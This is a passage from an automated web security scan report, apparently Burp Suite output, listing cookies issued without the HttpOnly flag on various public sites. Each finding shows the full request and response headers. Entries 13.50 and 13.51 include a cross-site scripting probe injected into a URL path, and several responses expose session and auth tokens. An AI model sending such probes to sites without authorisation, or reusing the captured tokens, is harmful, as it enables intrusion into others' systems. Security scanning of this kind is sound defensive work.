Host: www.bizfind.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 03 Feb 2011 21:48:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 11262
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSQQCTAQA=MBEEKNBBLDIKBKLLPOJKBBJH; path=/
Cache-control: private


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>ABC DEVELOPMENT INC - CHICAGO/X22</title>
<meta name="descrip
...[SNIP]...

13.49. http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.bizfind.us
Path:   /15/182221/abc-development-inc/chicago.aspx/x22

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /15/182221/abc-development-inc/chicago.aspx/x22 HTTP/1.1
Host: www.bizfind.us
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSQQCTAQA=KHEEKNBBHJMPFGDEDDNMBPHF; __utmz=252525594.1296786866.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __utma=252525594.371918977.1296786866.1296786866.1296786866.1; __utmc=252525594; __utmb=252525594.1.10.1296786866

Response

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 18:00:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 11262
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQSSDQDQB=FHLOGJOBGLJDLKGKDICEMEGL; path=/
Cache-control: private


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>ABC DEVELOPMENT INC - CHICAGO/X22</title>
<meta name="descrip
...[SNIP]...

13.50. http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22/%22ns=%22alert(0x0006C1)  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.bizfind.us
Path:   /15/182221/abc-development-inc/chicago.aspx/x22/%22ns=%22alert(0x0006C1)

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /15/182221/abc-development-inc/chicago.aspx/x22/%22ns=%22alert(0x0006C1) HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.bizfind.us

Response

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 18:00:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 11710
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQSSDQDQB=HHLOGJOBEBKFBOBPFALAANON; path=/
Cache-control: private


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>ABC DEVELOPMENT INC - CHICAGO/X22/"NS="ALERT(0X0006C1)</title>
...[SNIP]...

13.51. http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22/%22ns=%22alert(0x0006C1)  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.bizfind.us
Path:   /15/182221/abc-development-inc/chicago.aspx/x22/%22ns=%22alert(0x0006C1)

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /15/182221/abc-development-inc/chicago.aspx/x22/%22ns=%22alert(0x0006C1) HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.bizfind.us

Response

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 02:35:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 11710
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSQQCTAQA=GNNNLNBBCDCJFMEMFLPKHOHL; path=/
Cache-control: private


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>ABC DEVELOPMENT INC - CHICAGO/X22/"NS="ALERT(0X0006C1)</title>
...[SNIP]...

13.52. http://www.bizfind.us/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.bizfind.us
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Host: www.bizfind.us
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Date: Fri, 04 Feb 2011 02:36:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
Location: http://www.bizfind.us
Content-Length: 0
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSQQCTAQA=CBONLNBBJDMBAKPEBCOICOPH; path=/
Cache-control: private


13.53. http://www.bizfind.us/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.bizfind.us
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: www.bizfind.us
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSQQCTAQA=KHEEKNBBHJMPFGDEDDNMBPHF; __utmz=252525594.1296786866.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __utma=252525594.371918977.1296786866.1296786866.1296786866.1; __utmc=252525594; __utmb=252525594.1.10.1296786866

Response

HTTP/1.1 301 Moved Permanently
Date: Fri, 04 Feb 2011 18:00:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
Location: http://www.bizfind.us
Content-Length: 0
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQSSDQDQB=AKLOGJOBBOAKPBCKBPLDNKNG; path=/
Cache-control: private


13.54. http://www.boldchat.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.boldchat.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.boldchat.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Resin/2.1.13
Cache-Control: private
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM", policyref="http://images.boldchat.com/w3c/p3p.xml"
Set-Cookie: JSESSIONID=aEIjMQSaeS8g; path=/
Content-Type: text/html; charset=utf-8
Date: Thu, 03 Feb 2011 19:19:32 GMT
Content-Length: 37731


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...

13.55. http://www.butterscotch.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.butterscotch.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:48:30 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=98b457a4a7f44659396f2125549c905d; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 98b457a4a7f44659396f2125549c905d=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siD7RLYJm73OfIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 63182

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...

13.56. http://www.butterscotch.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.butterscotch.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /?src=tcv3video HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:48:31 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=9cd00a7bedd9d1a8c93d852d79adbcb6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 9cd00a7bedd9d1a8c93d852d79adbcb6=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siD7RLYJm73OfIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 63409

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...

13.57. http://www.butterscotch.com/tutorials.html  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.butterscotch.com
Path:   /tutorials.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tutorials.html HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:48:32 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=4f3e97b05b6880b7e05533d94dab21a4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 4f3e97b05b6880b7e05533d94dab21a4=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siAQsiftGd%2BatIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 56018

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...

13.58. http://www.descargargratis.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.descargargratis.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.descargargratis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:53:09 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8c PHP/5.2.11
X-Powered-By: PHP/5.2.11
Set-Cookie: PHPSESSID=735e937bfbeb0c58f8091116f1047d79; expires=Sun, 06-Feb-2011 21:53:09 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: BS_www.descargargratis.com=735e937bfbeb0c58f8091116f1047d79; expires=Thu, 10-Feb-2011 21:53:09 GMT; path=/
Set-Cookie: BS_www.descargargratis.com=735e937bfbeb0c58f8091116f1047d79; expires=Thu, 10-Feb-2011 21:53:10 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 41154

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Descargar pr
...[SNIP]...

13.59. http://www.directorystore.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.directorystore.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.directorystore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:19:36 GMT
Set-Cookie: JSESSIONID=NK1LJBxvx22f1j4q4lQ7pLGn81QPQXGTkSvkdtZp1Gfp3kNQJx9t!1845141040!-904548398; path=/
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Server: Unspecified
Set-Cookie: NSC_xxx-ejsfdupsztupsf=ffffffff9482e55245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 19:27:11 GMT;path=/;httponly
Content-Length: 29576

   
<html >
<head>

<title>Directorystore.com - Directorystore.com - Worldwide Directory Source</title>
<!-- BEGIN metainfo Include -->
       <meta http-equ
...[SNIP]...

13.60. http://www.expertrating.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.expertrating.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.expertrating.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 03 Feb 2011 21:49:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 34238
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQQAAATSB=HNEHKCKAPEKPJKCMAAKCHOBB; path=/
Cache-control: private


<html>
<head>
<meta HTTP-EQUIV="Expires" CONTENT="Wed, 10 Jan 2000 01:01:01 GMT">
<meta name="keywords" content="Online certification, Pre employment testing, Online courses, Online testing, Sk
...[SNIP]...

13.61. http://www.gambleaware.co.uk/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.gambleaware.co.uk
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.gambleaware.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Set-Cookie: ci_session=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22496e6b6f48b618826426ea7a0fec1562%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A15%3A%22173.193.214.243%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F4.0+%28compatible%3B+MSIE+7.0%3B+Windows+NT+6.0%29%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1296769772%3Bs%3A10%3A%22last_visit%22%3Bi%3A0%3B%7D; expires=Thu, 03-Feb-2011 23:49:32 GMT; path=/
Set-Cookie: X-Mapping-hnnbnhog=14820B766AF8700E7B2E8B5D31EF3F61; path=/
Content-Length: 6354
Date: Thu, 03 Feb 2011 21:49:32 GMT
Connection: close
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=2, max=99

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>

...[SNIP]...

13.62. http://www.ksbe.edu/gallery/postcards.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.ksbe.edu
Path:   /gallery/postcards.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /gallery/postcards.php HTTP/1.1
Host: www.ksbe.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 03 Feb 2011 22:00:53 GMT
Server: Apache
Set-Cookie: sessionid=bifapkf2tre2uqk9u35pfi9i07; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 4images_lastvisit=1296770453; expires=Fri, 03-Feb-2012 22:00:53 GMT
Set-Cookie: 4images_userid=-1; expires=Fri, 03-Feb-2012 22:00:53 GMT
Location: http://www.ksbe.edu/gallery/index.php?sessionid=bifapkf2tre2uqk9u35pfi9i07
MS-Author-Via: DAV
Content-Length: 0
Connection: close
Content-Type: text/html


13.63. http://www.linkchina.com/wholesale/golf-clubs.html  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.linkchina.com
Path:   /wholesale/golf-clubs.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /wholesale/golf-clubs.html HTTP/1.1
Host: www.linkchina.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.14
Date: Thu, 03 Feb 2011 22:01:50 GMT
Content-Type: text/html;charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: JBoss
Set-Cookie: JSESSIONID=D44E47A48566C6E25242FFA27CBCB248; Path=/
Set-Cookie: LinkChinaCookie=SellerLinkChinaSession_D44E47A48566C6E25242FFA27CBCB248; Domain=.linkchina.com
Set-Cookie: LinkChinaCookie=SellerLinkChinaSession_D44E47A48566C6E25242FFA27CBCB248; Domain=.linkchina.com
Set-Cookie: LinkChinaCookie=SellerLinkChinaSession_D44E47A48566C6E25242FFA27CBCB248; Domain=.linkchina.com
Set-Cookie: LinkChinaCookie=SellerLinkChinaSession_D44E47A48566C6E25242FFA27CBCB248; Domain=.linkchina.com
Set-Cookie: LinkChinaCookie=SellerLinkChinaSession_D44E47A48566C6E25242FFA27CBCB248; Domain=.linkchina.com
Set-Cookie: LinkChinaCookie=SellerLinkChinaSession_D44E47A48566C6E25242FFA27CBCB248; Domain=.linkchina.com
Content-Length: 95252


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv=
...[SNIP]...

13.64. http://www.linkedin.com/pub/troy-brown/07/287/56A/x22  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.linkedin.com
Path:   /pub/troy-brown/07/287/56A/x22

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pub/troy-brown/07/287/56A/x22 HTTP/1.1
Host: www.linkedin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID="ajax:6393265550819748814"; Version=1; Path=/
P3P: CP="CAO DSP COR CUR ADMi DEVi TAIi PSAi PSDi IVAi IVDi CONi OUR DELi SAMi UNRi PUBi OTRi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT POL PRE"
Set-Cookie: leo_auth_token="GST:8umv_nS7XFzUyxeKwcm4-54LG5Af_dxZBECJyfS9zSz2oe7lnSRZnR:1296764778:7cadffe11cc6d886b438c64892ac7c2f8d826bc7"; Version=1; Max-Age=1799; Expires=Thu, 03-Feb-2011 20:56:17 GMT; Path=/
Set-Cookie: s_leo_auth_token="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: visit=G; Expires=Tue, 21-Feb-2079 23:40:25 GMT; Path=/
Set-Cookie: bcookie="v=1&b190bc23-5ec6-4de1-a9c4-5a80edfac251"; Version=1; Domain=linkedin.com; Max-Age=2147483647; Expires=Tue, 21-Feb-2079 23:40:25 GMT; Path=/
Set-Cookie: lang="v=2&lang=en"; Version=1; Domain=linkedin.com; Path=/
Location: http://www.linkedin.com/pub/troy-brown/7/287/56a
Content-Language: en-US
Content-Length: 0
Date: Thu, 03 Feb 2011 20:26:18 GMT
X-Cache: MISS from www.linkedin.com
X-Cache-Lookup: MISS from www.linkedin.com:8080
Via: 1.0 www.linkedin.com (squid/3.0.STABLE20)
Connection: keep-alive


13.65. http://www.linkedin.com/shareArticle  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.linkedin.com
Path:   /shareArticle

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /shareArticle HTTP/1.1
Host: www.linkedin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="CAO DSP COR CUR ADMi DEVi TAIi PSAi PSDi IVAi IVDi CONi OUR DELi SAMi UNRi PUBi OTRi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT POL PRE"
Expires: 0
Pragma: no-cache
Cache-control: no-cache, must-revalidate, max-age=0
Set-Cookie: leo_auth_token="GST:ZvpYDWFtWOPUWYjh_jHyedipSluAqpcn6vhruIXa2CDdWVdPpP66g5:1296760855:7d27a506e0853359e3965f871f95b1bfef8c45d6"; Version=1; Max-Age=1799; Expires=Thu, 03-Feb-2011 19:50:54 GMT; Path=/
Set-Cookie: s_leo_auth_token="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: JSESSIONID="ajax:0561599565067721010"; Version=1; Path=/
Set-Cookie: visit=G; Expires=Tue, 21-Feb-2079 22:35:02 GMT; Path=/
Set-Cookie: bcookie="v=1&695a9322-0059-4252-9172-662df4a2e00f"; Version=1; Domain=linkedin.com; Max-Age=2147483647; Expires=Tue, 21-Feb-2079 22:35:02 GMT; Path=/
Set-Cookie: lang="v=2&lang=en&c="; Version=1; Domain=linkedin.com; Path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 7453
Date: Thu, 03 Feb 2011 19:20:54 GMT
Set-Cookie: NSC_MC_QH_MFP=ffffffffaf19965045525d5f4f58455e445a4a42198c;expires=Thu, 03-Feb-2011 19:51:08 GMT;path=/;httponly

<!DOCTYPE html>
<html lang="en">
<head>


<title>LinkedIn Sign In | LinkedIn</title>

...[SNIP]...

13.66. http://www.macraesbluebook.com/search/company.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.macraesbluebook.com
Path:   /search/company.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /search/company.cfm HTTP/1.1
Host: www.macraesbluebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html; charset=UTF-8
Location: /index.cfm
Server: Microsoft-IIS/7.5
Set-Cookie: CFID=56399166;expires=Sat, 26-Jan-2041 20:27:36 GMT;path=/
Set-Cookie: CFTOKEN=20340254;expires=Sat, 26-Jan-2041 20:27:36 GMT;path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 20:27:35 GMT
Connection: close


13.67. http://www.made-in-china.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.made-in-china.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.made-in-china.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:28:13 GMT
Server: Apache
Cache-Control: private
Set-Cookie: sf_img=AM; domain=.made-in-china.com; path=/; expires=Fri, 03-Feb-2012 20:28:13 GMT
Set-Cookie: cid=jAxMTAyMDQwNDI4MTM4NjMwMDA6MDE3MTM0NDI4NzEyMzU4MTU1MTEM; domain=.made-in-china.com; path=/
Set-Cookie: sid=TE5OTQ5MTE5NTgzMjI5MzoxNzMuMTkzLjIxNC4yNDMO; domain=.made-in-china.com; path=/
Set-Cookie: JSESSIONID=aYL_X1GnJqlf; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html;charset=GBK
Content-Length: 98587


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<base href="
...[SNIP]...

